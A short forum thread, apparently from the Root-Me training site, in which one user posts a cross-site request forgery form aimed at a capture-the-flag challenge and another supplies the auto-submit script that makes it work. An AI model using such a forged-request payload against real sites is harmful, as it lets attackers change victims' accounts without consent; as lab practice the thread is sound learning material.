Web - Client

Friday 23 September 2022, 16:24  #1
Web - Client | CSRF 0 protection
iiiDaitoIII
iiiDaitoIII
  • 2 posts

Hi, can someone give me a hint about what am doing wrong pls
ma submitting this payload to the contact form
form id="csrf" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST" enctype="multipart/form-data">
input type="text" name="username" value="r">
label>Status:
input type="checkbox" name="status" checked>
button type="submit">Submit

form>
but it doesn’t seem to work can someone explain why??

Thursday 2 February 2023, 18:09  #2
Web - Client | CSRF 0 protection
FearZzZz
FearZzZz
  • 2 posts

Hey mate,

You need to inject the script as well to auto submit your form, i.e.:

<script>document.getElementById("csrf").submit();</script>

Then just wait a few minutes and go to the "Private" tab.

New reply New reply   New topic New topic